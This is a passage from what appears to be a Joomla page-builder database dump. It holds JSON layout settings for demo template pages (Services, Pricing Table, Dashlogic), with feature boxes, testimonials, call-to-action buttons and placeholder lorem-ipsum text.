0px\",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\\n\\n\\n\",\"title_margin_bottom\":20,\"title_margin_top\":0,\"title_text_color\":\"#333333\",\"title_fontsize\":36,\"heading_selector\":\"h2\",\"title\":\"Showcase\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"30\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"98\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px 0px 0px\",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#fafafa\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/cta_bg.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0px\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Ready to our latest creation Helix III\",\"heading_selector\":\"h2\",\"title_fontsize\":\"36\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"30\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download\",\"button_url\":\"#\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]}]',-2,0,1,0,'2015-01-22 07:12:35',391,'2015-02-03 06:17:16',864,'','','','1','*',0),(4,'Services','services','[{\"type\":\"sp_row\",\"layout\":\"444\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0 \",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":0,\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h2\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Well Documentattion\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-book\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Dedicated Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-users\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px\",\"padding\":\"60px 0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/demo/cta_bg.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client-white.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]',-2,0,1,0,'2015-01-22 07:12:35',391,'2015-01-26 19:05:52',391,'','','','1','*',0),(5,'Pricing Table','pricing-table','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"\",\"padding\":\"40px 0px 25px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#049bef\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"#ffffff\",\"title_fontsize\":36,\"heading_selector\":\"h2\",\"title\":\"Our Services\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[]}]},{\"type\":\"sp_row\",\"layout\":\"444\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0 \",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":0,\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h2\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Well Documentattion\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-book\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Dedicated Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-users\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px\",\"padding\":\"60px 0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/demo/cta_bg.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client-white.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]',-2,0,1,0,'2015-01-22 07:12:35',391,'2015-01-23 11:13:01',391,'','','','1','*',0),(6,'Dashlogic','dashlogic','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"\",\"padding\":\"170px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/featured-bg2.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":500,\"animation\":\"fadeInUp\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"FREE JOOMLA TEMPLATE\",\"heading_selector\":\"h1\",\"title_fontsize\":\"72\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"20\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore. sed do eiusmod tempor incididunt ut labore et dolore\",\"subtitle_fontsize\":\"18\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"70px 0 5px\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":200,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":400,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"50px 0 100px\",\"margin\":\"0px 0px 100px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":200,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Mega Menu\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-list\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent 